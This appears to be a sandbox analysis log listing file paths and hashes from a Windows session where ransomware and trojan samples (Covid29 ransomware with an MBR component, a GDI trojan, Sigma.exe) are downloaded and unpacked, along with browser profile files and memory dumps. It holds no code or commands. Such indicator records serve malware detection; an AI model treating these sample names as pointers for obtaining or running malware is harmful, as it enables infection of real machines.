C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 33d8eebde9c33f36af51a36281e3eb95 |
| SHA1 | 001959a7b55fdcc9dc99ba72f36439c4bafd9418 |
| SHA256 | 2cebecae552ef3e9ab44454fe9e14970bfc7b90f6dc98135756867543dae8513 |
| SHA512 | d8dc179347baee7ef4f731787074fe9e1b033def4cec8b6798266b988c0cda1fb3b31b818f6a1660b86657360539e4649fc8324c832092a4463d5817039111a0 |
C:\Users\Admin\Downloads\Unconfirmed 664769.crdownload
| MD5 | e1c349613b45937a4c32d58f159c7da1 |
| SHA1 | d94356e0a32b07f1222242c9bc05078e369defb3 |
| SHA256 | f5d24057c873f9a70e67684a8562f550e2f6de2e317b63393256b1bc3bd9dd79 |
| SHA512 | 95ac12721c9eb84c503b11b62009bf709dabed449fe1f92c41614571ae776341d139e7b16a73b462d26f79714770b62e2122aa5c46af67e7872dc9969d830526 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 1a8b9275ed00b8e27039acd29398e689 |
| SHA1 | ac9fabd43eefd8820b4dbf43a269dbe0bb180688 |
| SHA256 | 8eb213eb5be1252f636a04150e4ae7618459abc42bf2829fb79c31036ca401f3 |
| SHA512 | 750f46c783e8c15f0821d19438bd26fab66abfd5cad1f00612433668495827512b448e7c62ab894d569efe6c01d1e69f1ef4aa5b8ae96e362a49655103f6fde2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 553a0a3baa550262dc8a91d5cec06040 |
| SHA1 | f39b2715aebeea10f649aafa5df1a401c1a32a19 |
| SHA256 | 5df0dcda063a63812408b84b920ae6d79abf513342e200ba6b0f23efd5bdd137 |
| SHA512 | 4379ca0906104ae4f390a701e6aedd209823ec4ad4e62249b9d5f095bab1251015fcc105671f30a01f2461444648b9255a8c64d59c5852e1aa206cfaa0ac8b40 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a00097c01412f03853bb62057a3795f9 |
| SHA1 | 592f6835cc100b9f4b49e946c5f80c7e50b75af6 |
| SHA256 | 308c5037cab304e8ca3b6086d04c58b06337acbdb50063181ec5ae46dedf5757 |
| SHA512 | 797223458eeb2b540863cc018c57296a601747d6b4897dbacd7ce3b894dfd843c4b4b2ab48926fd8f1093da58021be14942058c4bff30602c79474939c8113b3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | b459a53dae63dff001b08d26abc913ba |
| SHA1 | 4e79ec1e14a1a50889af5185376f8834a921f115 |
| SHA256 | 5870959a3319ed0b378221bc1e18b2ec2e5277cc7291e806c49473a27a1361de |
| SHA512 | faec8518a2a005fff86f29a82f3de0550bcd582ddfecb6919da183771384a21c93f75d984e81fdfad982a7196d3786689cbbeec16624e4fb1ab16132038d9a3a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d947fb43b2535a2a46958492520377f9 |
| SHA1 | 3133f55563654ea10c8fe219d69f49f61adeb216 |
| SHA256 | 15f4c9fcb5dcfa3e5e8d6b5933c2647cb30aeb067df9b8b8f8f37eb978e06323 |
| SHA512 | 0795082a4a7a9eba14a7f5ae27dd4187d43ade4dc63b34e742be497c2a6433fe1a4127d6a9768e86ad15a1dd12c11d8aae59d2bc3500afaae0dde6448d6d0b4b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 65b2fa21391411a7eb9236a6e00e7897 |
| SHA1 | 2ade3762dd39cb147eb4019594b5fbc217f31ca8 |
| SHA256 | b6a7873bc84668db76c3e08a8171f8051e73d59a3d5a855be65b801dc793e801 |
| SHA512 | 19824e31fa1078f85f8772b31f564d0138d2492d8f4ca6f88c06751f314dfbc3e199d70f71f5834cab2a34bdff1ed97b21018d98e123bf08283168e1e0c52c3a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f8764f8105a0edef230b05653b5a90c4 |
| SHA1 | ff9d8ef378e0822c80764d4018ed763d80999df2 |
| SHA256 | 52fa77bdc41daabcd01a50e5df84a88645daabdc2acdb2a95e48e8431a6f91f4 |
| SHA512 | d575a42cb5e8cd35558bd0c730c6b0cb01f65b045b5ed3be71906e51cc1c97c759a8c15df02ef3cc012fdbce12bb2994bec45f218e4b47ca2edfb9357db4764a |
C:\Users\Admin\Downloads\Unconfirmed 732348.crdownload
| MD5 | cb1f16dac1328423173e403300ca93d5 |
| SHA1 | 5cf379db08711c6e5b532fe6a774a443f22e23fb |
| SHA256 | 00225d2881339e946b6b76b8debdbd6e90df3b131160932cd7bcc351fa703ee8 |
| SHA512 | e9994415c6dbc99db8172f58275a6714a8027411abe5a7c09fd9ec618f5a439ca14597d592f5f6d8db11c621ae85fd3960e30533cd9efe0a79f61561765ed56d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | fc637a31e9eecaf665deecbd85276c8d |
| SHA1 | 2c2244b5e151c7226a8121bd2b8de40531924cb2 |
| SHA256 | edbaf95ae8a0b16bf51144cceeb3b640a91b33661d2ec231073f25eceb6eb469 |
| SHA512 | 64bec3de96476445582a9cae544095b4a0461c012bc5f822edad047628b477c7973f1a7c67dd57382efed5728681d766d5b1f827aaef8498366516b1209a8d27 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c89440f7df6eb8ba6738a7dbc213e9e4 |
| SHA1 | 2bd896716bafb67d88844d68ba3d0792430427cf |
| SHA256 | 228fb8ed16b476032cddad62b0cbb72a7d060adf9684fb2a8b22ead7f93263a0 |
| SHA512 | 383179e0a2720921f853570b7d3da3b2b1b9210a36809f3ba2aebd435a2b8abb3aff4814bf102b0bd358a7a45bd35865efda891a8f0763c2bef5c59d17c7a312 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 86e37c786835dddd250f5a170f3863d9 |
| SHA1 | c8aeb4d1e2c84eb88c722076938eba335437bb58 |
| SHA256 | a4f2d22046cd03b5a8671b17fde9a2fd1e4f2ac0743a9bd8781f5a0bc2b739ff |
| SHA512 | 98678654b63674e4aea51fef581dd4bbe56be74e5fcbecaca586dc10b4a48355694b34e1d612bb41ce4912a18ca89ea68a2c55458b59c7139e9e0a7813afff04 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0f62ee716d8a0ef9b853707ab3ad08ee |
| SHA1 | e41b2ae7c3dc12dc42b413ab799ec2164edc707e |
| SHA256 | b82d1a4fc51bd5cb71eeecf77194af9ec8b3848b43b2524060899794c1a0c799 |
| SHA512 | 07a00e1b9f9b119ff2d9d57986438b2297e0fe42375f6cf29a6f6ccc00d6db49262eb66dbe81066da54df6aa1aae6584068638e1e0d8b4bbd2c8e8e2617fae3b |
C:\Users\Admin\Downloads\Covid29 Ransomware.zip
| MD5 | 272d3e458250acd2ea839eb24b427ce5 |
| SHA1 | fae7194da5c969f2d8220ed9250aa1de7bf56609 |
| SHA256 | bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3 |
| SHA512 | d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | cebe143330bc31f076f0d8a09150eb3e |
| SHA1 | 3366967236908c1ff94cbdc46099874da866de4f |
| SHA256 | a2f45870cd0c54c60abc412da8b7cfcc6e81419f80fcee609e91fb38cd3692d7 |
| SHA512 | c0782b370d4c5f33f77d6f7e9f0dbb7623f0c09670c3631dd0c026e3d6b1a1a33ccf72a5f746ea0643a65931a4b0e1f1ec008c52ef6fd757e6298a9010738e3b |
C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe
| MD5 | 9f0563f2faaf6b9a0f7b3cf058ac80b6 |
| SHA1 | 244e0ff0a5366c1607f104e7e7af4949510226ec |
| SHA256 | a8054338891db7231f9885ca0d3bc90a651c63878ff603ede5c3efafa7e25254 |
| SHA512 | 40cdf4c754977e60c233417e42a62be02f9b5bfe239c0378664c28757ce6ce1fc3b91b83d6ef6bb184c4d831761f57a07255526d12a3a955c3b473bddb97f4c9 |
memory/4332-2666-0x0000000000400000-0x00000000005D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7D12.tmp\mbr.exe
| MD5 | 35af6068d91ba1cc6ce21b461f242f94 |
| SHA1 | cb054789ff03aa1617a6f5741ad53e4598184ffa |
| SHA256 | 9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e |
| SHA512 | 136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169 |
C:\Users\Admin\AppData\Local\Temp\7D12.tmp\Cov29Cry.exe
| MD5 | 8bcd083e16af6c15e14520d5a0bd7e6a |
| SHA1 | c4d2f35d1fdb295db887f31bbc9237ac9263d782 |
| SHA256 | b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a |
| SHA512 | 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a |
memory/1684-2690-0x0000000000400000-0x00000000004D8000-memory.dmp
memory/3052-2691-0x00000000007A0000-0x00000000007C0000-memory.dmp
C:\Users\Admin\Desktop\covid29-is-here.txt
| MD5 | c53dee51c26d1d759667c25918d3ed10 |
| SHA1 | da194c2de15b232811ba9d43a46194d9729507f0 |
| SHA256 | dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52 |
| SHA512 | da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ab8ad564ff2dec544592e1b1c232f261 |
| SHA1 | 49002ebe43d5731eb2c6a3f5cbc68489f3b6fea6 |
| SHA256 | d428aaab9239887c6bb47641970edf0b5d7a68b4f09d1e7d5f1bc190124496c1 |
| SHA512 | cf835f27feca3dfb0afda5f1203a5053a611cbd8594cc5f6d765cb217aa465ec93190d5210e3a01b0cd5abb64363cd2bf06f778258b2cdd0529adb50334d1616 |
memory/4332-2785-0x0000000000400000-0x00000000005D5000-memory.dmp
C:\Users\Admin\Downloads\MS 0735.6+7421.zip
| MD5 | 1b3cf59e94f7d599ed2d54c1f82acb5a |
| SHA1 | 10d84b9096c92331106212af9a88cc7f8119c458 |
| SHA256 | 57c3e5002750b9da9dbf7526a1288bbd84f339fadc16f828ef20d1889c51e483 |
| SHA512 | 113328d190125c1dd0f7b5dc323a68c41f5a98c1afbec51e414c5f2776097bb1daf44af9aa58acb221c82c11e68b580f414ead1cf8184caf28da259793555a45 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ff56eea9599e4b83385c66ea3e0ca9b9 |
| SHA1 | 363bede592cc6b2dafc1574b0919c0d70c918191 |
| SHA256 | c2e64d52871a39e9c6ab73c1bfeea9a9bbfba1a69fd4c23af896e81482d191a4 |
| SHA512 | eda46277453fc7b52d019ddaf9f8c69419d699084e8d1f7cedee61a373cdbedbb9c45278ba9a0a4c2863471fc5b1b168b90c21d0f53060646f9759cbd573d837 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2144dc7963bdd848949f8b89e89da468 |
| SHA1 | 0b79097e699524aa4b3bed7aced9f9423bff8138 |
| SHA256 | 092b59c89f78654bf12361c82b8313f9bb805eb8d3a13c0bb013c6b8b925a880 |
| SHA512 | ef4980b7fa8652ef1181a379dc21a625b4d97b8d0b69f52a2e9d81e0986ece7a5586ddf446c6e8777ba2b8b089aba34bcf32b32c36f382dd8bb7f176be94eed4 |
C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe
| MD5 | b13850aceaf6c1ee66c61bc94135fa25 |
| SHA1 | f23280f6bec2f097ddf77b97bb19b643a2c5a80b |
| SHA256 | ae2a43a7d58e9766fac59032ba1ecf1df7866ce5bc09b879c6bb111036789ed2 |
| SHA512 | d4344edb6e4a460e162169e5621fbf851538c70c6489cca034d1600c3a9a677e8cfa0607e464ea8de3a22066928f540833bc10bf18ae3b1ec7e9147c0d3a897b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 87dbf04788c4696611ae9c7d1af4e9ed |
| SHA1 | f8cf3ed4f987837feaa43215487523860892bc85 |
| SHA256 | 0628d2f27e2af4e089da29b4bfd151db3a04a9ee7aa9152022f9eb3246159c7a |
| SHA512 | 6e2b005d054f891d033ad97aaf3bad5bf6e007545deb9373bfeaef9c1fe912102cba4334ec157da41f142ea212c6b84b62f4fa8a202a76e119f5deaf9b01189d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 6fd1a41539224f2feeac6449f7ce1155 |
| SHA1 | 7089df1867d7b20204ce6b3a3dd5434ff12535a6 |
| SHA256 | ca44b7313a37fe52eda40093ccb72e886890f1778201a0ca4802d83e2376a6a7 |
| SHA512 | 7fe0366e920c3f410b42475070de8c081f129155c3eea0bd87743a13b91560e2faa6120abe74a6bb21633f09b3e845295f84fb13a617c773e3df0f48d6448a47 |
C:\Users\Admin\Downloads\Unconfirmed 539169.crdownload
| MD5 | 75256220b5bfc94348a32685985af787 |
| SHA1 | a63e1eba08e1d0b520ca5e3ba92d07d0e938f430 |
| SHA256 | d6a5b4ac0b84250c190475874969626dc170ace6f51ccd9e5dea2d133fc377d5 |
| SHA512 | 40a2642ac858546f477c98f3f50c9a3f8985a904e25438cc14de19ec1ac41fe681d5d8bcda8ec44f2c82c9076da279936bf852949deaa96f04780ab433c9b36d |
memory/184-2912-0x0000000000400000-0x00000000004B8000-memory.dmp
memory/296-2913-0x0000000000400000-0x00000000004B8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8e192a5dcf4cd7f64cd3fa981903f51b |
| SHA1 | 6233fd6428d81f7fe97cf205e65fde19d6eb6487 |
| SHA256 | 1abf9b3580ced28bc93f80b97638a32d2db245ab8fea99025b3b13d032481112 |
| SHA512 | 7883b718edf6e1de97571529fb98d2752b3939ef0220bd76609229b3213356282ff2203ed7dab548dffe90b5a1c8b861e7db52dc226ec0039188baa64d5d5223 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3a1f1731c189ce5a0379353eef6639bf |
| SHA1 | 4bd15d71921f1e244dd241156a917d58343ce886 |
| SHA256 | 40d157d668a1798aa4a8d4fcf168cd7918b546a7ac7d43dfb5a0b490085de1e9 |
| SHA512 | f51b23f7d1fcd14300979b6ee62c3989c1df9dfe4495cc92ed74bded205789a3520090a1b8e5bb840440704c96122cd577304a41f18438a69f2fb1938dec0b96 |
memory/184-2942-0x0000000000400000-0x00000000004B8000-memory.dmp
memory/296-2943-0x0000000000400000-0x00000000004B8000-memory.dmp
memory/296-2944-0x0000000000400000-0x00000000004B8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b7f949f6280b3fd543efbb372b8f24e9 |
| SHA1 | 966cdc367ae1f37a12870bbb29c30a53da71d7b2 |
| SHA256 | 81034e3e0eb9df7ebe16b28f37891b217d2c82eaad9f108ee78039a755a39a57 |
| SHA512 | 39a4a9ee21b0ccb703100aa875ad4f088c1390e855771f0b384002a0422aa79db49f88c5a0df3c2d5d18720f68dce2c486baa32fd012afaa2da343351d91cb2d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 45d49b49068477e8281db7ddeec2ff06 |
| SHA1 | fc4efb374144c0adb4285cf521a059b5748addd6 |
| SHA256 | ed12c37334391ea00f2088edd5186320fd2d6019d0cb43cb96c231fadcd72882 |
| SHA512 | 6f4b2c64b9a29ea724d82d7aff7a2b5ff7a8fab301ded9a01a58b767e3f1f4560493832a9dbbbca8a2a38815b74e0211f63338e029aab12bedb08d05fb736fd4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\18c417df-4d7f-4fee-8ea8-f30e0e3e0fbf\0
| MD5 | a97a84f0a7dcdd5ac12389f444e00366 |
| SHA1 | 4e32298915a4461a71ac4571487a27d96e0e78ba |
| SHA256 | e74c977ee368ec683d52febe676b26c11085e072c5e3f608d5c45bacd0d4a877 |
| SHA512 | a6ea7cbc4324140c6d34d417268efa725e34e82b88146418fca8f6c281489bdf01ad22b73ed4ce1580b87c7fb2a05b7d2340ca6d7a621e0d267736d21f1c564d |
C:\Users\Admin\Downloads\Solaris 2.0.z01
| MD5 | 785e18d17f4e2134d93c51fe3d5ee6b1 |
| SHA1 | aa00b501547ce619b158d7ea6bdad104b3db00a4 |
| SHA256 | 9579c6d8e98d60688af84034100c1fb1e242f5c1b7a3ab44544200d600b85154 |
| SHA512 | 9c4f1b0d3f654fe72c461b0eb248866882ec45c1bcdb2cdd9851a1996246e528d475a2b9730cc893d2ccb2b1b1961864225e5dc4e6db20cbd828547d3a178eae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 23f2c2a5c42d1da2bdc8d7b0cfb325c7 |
| SHA1 | f1461d3db11e30c9fa7077766900e3dd32408b0e |
| SHA256 | 6217d7fa1a621cd1250ab72c74ffe1aa433a40062e802c1a18d65506a40f301b |
| SHA512 | d6c081a20c2b788202aae2c194b2d7a39212bffe4cbd1864ef8fa3b01bb7abae94de0bf8721c2d178e2d529c885cda11203f1276b3ef3896e81ef52e8bb3ba81 |
C:\Users\Admin\Downloads\GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip
| MD5 | b41f41dfc34cc8bdc2525044760d6e2e |
| SHA1 | 07db32c6c2d6aa20a05c15f43cec70fa1ac2efd1 |
| SHA256 | 065cfad474b90dd23e333b653d26cebde762d6b19ca051cce0b4157d3924667b |
| SHA512 | b26df6771769dc3be4fd3a08c9b46ffe57ce57419eac919d2937c82c0478bb999044a45d5242ba87d2e48a5e91e9ac9308f33f2a37bbd30a01866e48ecdd418d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 40a995c48aeee14b9756ef12c276a581 |
| SHA1 | 8b9c19b5b8fc27b7ecd2fca6d55d1d1b79602b15 |
| SHA256 | 902918782ec3669468fa31564063295a82e61dc887ff928a848354f5e57b2b42 |
| SHA512 | f44aef3243635fca99715174d6b81ac72212f652044eda4f8e6a6c5dae0bf29dc9115d0ea08759850a794b0db05bc24616ded50b28bc89c1ab82a85b8e0d9df1 |
C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe
| MD5 | 7d538a430eb4e0bfd7671b921a8b76a1 |
| SHA1 | 2add11e25d07dc9e154ae1be916c869804047146 |
| SHA256 | 3a4ea5e72e50bcba550efa034818f35785076adb37af4c1cee9374fe9e013ec1 |
| SHA512 | b6f0883f721d534afac93fb022f57593069aa17310bd874c37c66b0731c79d8885cc22614837e107c2b35f21210052e1a34b7b61c49418c3909493bf3e0011c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b431d6c165e804e5b3a4dcef51e61f07 |
| SHA1 | f80a9b74903873fa42b07ca160654024f1c4871f |
| SHA256 | 970012635d971a0e6fd66f9f2bc362702c660f204000db90b60860395308c248 |
| SHA512 | 88bf31c480b8c8b2d3e06b082039e6feaabd8d5a02c75eec0d88225cfe1edb01b6657cdd46d35db2dfa6c0c86558a2654bca574f13523e1092225d7f73cac3c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7b7149beb5bf0132d9fa06d2d865c739 |
| SHA1 | e1844d57c1fbaf3894cdb7e202bd9123af288bd4 |
| SHA256 | 7c3bf75a4f2ce676ec7770ccce921daf56762bf121cb5be288c597f82de08949 |
| SHA512 | 921ac268bd726421dc2f792c521f4836a3997d4d79eb6b753cc86879b221f462d04261165351306c42d0a465f51e7b16431400f3be12a2f534658d0a6eeba9f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | bff5f81a685128ecb22a7c9736c69613 |
| SHA1 | 0bce6981bba24f227c16f0848e344cc9369d04b2 |
| SHA256 | 3d369d2e8779a5ebcf66f40a5af4d91d6fbd98a9dd81f696217c8e6addaa71c8 |
| SHA512 | 299f9a31aa155217fe58451552e54618fe87fec2b1bb785a2d4ec66a29a065350be7ee1b91cb3f04dc818d8bb690b79ce47e7d1ce219ea3d03c292cb2a79227d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 05e186a18cc5feddba88e9f599e8c3a9 |
| SHA1 | 1351293cfb709c803619ef62fcab7feb532e8c39 |
| SHA256 | a655681a3a71ade37668280d64433b4e1216eec1404160da514691b7a1e2cf4f |
| SHA512 | 4c88d228e2975e89b524bc00ce2a9b86ccc48b6f03ae0a6b32965f5c344160d033e13c19897b22bc258e9b6c3ef8f768d2c64a39b3577d1b589fc576c734a4d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 6072b2b79c6c4f61782f17aaed329172 |
| SHA1 | 21e7364eac77c95dfd126fdb0905defab79d319e |
| SHA256 | 80378cd4a7eadc2015fbf967ea4b348e73ac30d77c032e2cf7aa883d4d8edee4 |
| SHA512 | e6417bfec5368b877851ba572116bf860ffc359174aff196b2bc337a1fde995301ca4a56bd60c48d3dcca8b93e29c16e976a305e5d9299128e5889c9b772f000 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\18c417df-4d7f-4fee-8ea8-f30e0e3e0fbf\2
| MD5 | f8c5eb6297dfae0059ba1f77f4e644d6 |
| SHA1 | 7379c6f3bd7b6d5270b4bc73e3163535c48be488 |
| SHA256 | fe0d8924c6e3c7085d9789b3888c1d54afc5f23e0446c877394fcf840c920508 |
| SHA512 | cf9dbe2fd60317aed75e29cd4bade316102c7e98f85050ed54c2ea587fc4c6d233bcc8ed061779e12513cbfc64a7c6a0b28c27b4623651a08beda23922e4a6f0 |
C:\Users\Admin\Downloads\KitteyHacker.7z
| MD5 | 18d864b1c6b485ebc3da38d13377de99 |
| SHA1 | 7c059264dfef0257875d2ab00c9fe6d5c9e6eedc |
| SHA256 | 600dae12ed7c7e5b313dc59be30dec573a871a9da8ea4344dadd15f228122dfa |
| SHA512 | b6896ae5a5dee626f0d9fd5f663d317ab2f5d7a2269b603cbe096c72ead4f5a37b0570952dc1c33c702083c531dec32af3a375a71d11ac610b4978dc39b9bb0e |
C:\Users\Admin\Downloads\Sigma.zip
| MD5 | 0ba2d3a3cb7185c7111c565e039e9b52 |
| SHA1 | 9381f3598acdc21136141674fbb7e05c9498dfb8 |
| SHA256 | 8366f11f3df2673f21db892e6199c38055f7895dcc43f46ec3a03ed4ab94127c |
| SHA512 | 25252283281019fb75df4266ed9b9a669f678200856a0369580b4108bbb4cd220d22857f111b56393f49023b864333dd70a2309caa3049b6e9ed6dcf480e1b92 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8ce068562756dbf5b8e3664cb9bef293 |
| SHA1 | 71afe691a01654d3783aaa722203452bc679f724 |
| SHA256 | 2c6f75321f4771f31f1bc4d6722298bef7d02018ce90f0bd21e4761809db3631 |
| SHA512 | b987bbc72c840d46b879a300fe17ea7b0275b904186ce6e41d27580399696fcb8f255bb56321ffdd2aa3cd2400bbf831c6b34f32123bd943df316b3ecb99da71 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe
| MD5 | ec8982bb5bc336fe8803c4ce78ca6b3a |
| SHA1 | 98d52086cb0fbeacdf6e722ea77553f701506ceb |
| SHA256 | d8e07b6a5984bec06dc7507fcecb31c7260b9367bd25ae4e9c6598f30d7c93b3 |
| SHA512 | c312605e5ae560dbb8e8ceb6db164235b115fc85739d46ffc9c19d534cb8f0d6e5800993b301a4bee175d7a8508a4fb39c9e7200efa1c52f5e736ee46d86303e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9899640cc2a10e8657957edd885258d7 |
| SHA1 | e3d07caccdba6bfede4f3d27f6f12df9d34cf222 |
| SHA256 | 9aae1c8af878ec953768d52ebf1a6d478745c3572bd3f7bdfc0ca3e46854c9c1 |
| SHA512 | 39ea8ad662317560995e0ba327f1b51cbdc5918d66547e7c18a4ac9f00b185276daa955b0992841baba27c1b69444735d2562294dd5f6e35d30492de73f4bbe2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 32131d5a36e0593df241efbf79d59fde |
| SHA1 | fb7f17ccd8eb20679ad96dc264561f20e92cbb07 |
| SHA256 | bf3162fa882d9f78f2c6a019e4896da3d01db3e1ef5edc36b67967bfbad25a46 |
| SHA512 | 3d0f0e4d3f26b16a40917a1e2d2594d1d4919fcb8612fe8ead064fe534514d025996e82ee7a2ed8e7ca2064f12e8a3a743217efcc0ae36711c1314da5f8f0d4c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 103bf7be419f49300356347ab81673d0 |
| SHA1 | f24aea0feb219450416b106cc4b63d136e68ddf7 |
| SHA256 | 7820b203a1231590ef09b7bab5b0e9046e23066d5861d98f67e7606cd5ca5818 |
| SHA512 | 32d8f044bed2f47e3f988208f33fd4faf865d0df1bf51e01a00483d8fb8f13b0f0258999443b94396bf019b0ee3b2337192dabb46bb7d619fc5fc2eed53e33cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 24aec99087f51ac8f1930db205b5e4d4 |
| SHA1 | ccfe62eb114c4e9215b0ce3a7fd697d166da32eb |
| SHA256 | 336ea2497e37641a5c35b0e6565ce8bd7ed4ad75d878feb465ce57d2879e4875 |
| SHA512 | 866a7f88f6dd9345112f39fbb6204ffcfa54cbc07375c6becf462d6e2d922d649906eb79381b678626619a83c6af11c241306bd261d8daeb0c949385fc65e94d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 97c8098a6960af14e4f4e3be85827682 |
| SHA1 | c60e76c9af913b37f3fc80cea254d7a457538484 |
| SHA256 | e89dec039e27f6f5515ca27932a28380b5ce8be613020a2de17419c7de6fbd93 |
| SHA512 | b359efb9f8cbe27d6f71c379f412447f00cf627f20675cdfbc5cbf7dc5e27bada898be15802e7a0e71bec8f01fb8d6c19878474ae1667e5ddb9ca64cea68d3d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 20ad63659f4538ba8192422406096540 |
| SHA1 | 162d857e420b622457662010b712950802f1e740 |
| SHA256 | adce09317abb55170608d45f4b2b13ae5d7a15c654913bae7664c0545bfecda7 |
| SHA512 | 2f66798625c2808183897c736b35b7f76879471c260381556d38bf4ae56787178c01430e3cebb723fb02ba6bc1c209d3544cc8b47c92db2feda232f453ee988c |
memory/184-3368-0x0000000000400000-0x00000000004B8000-memory.dmp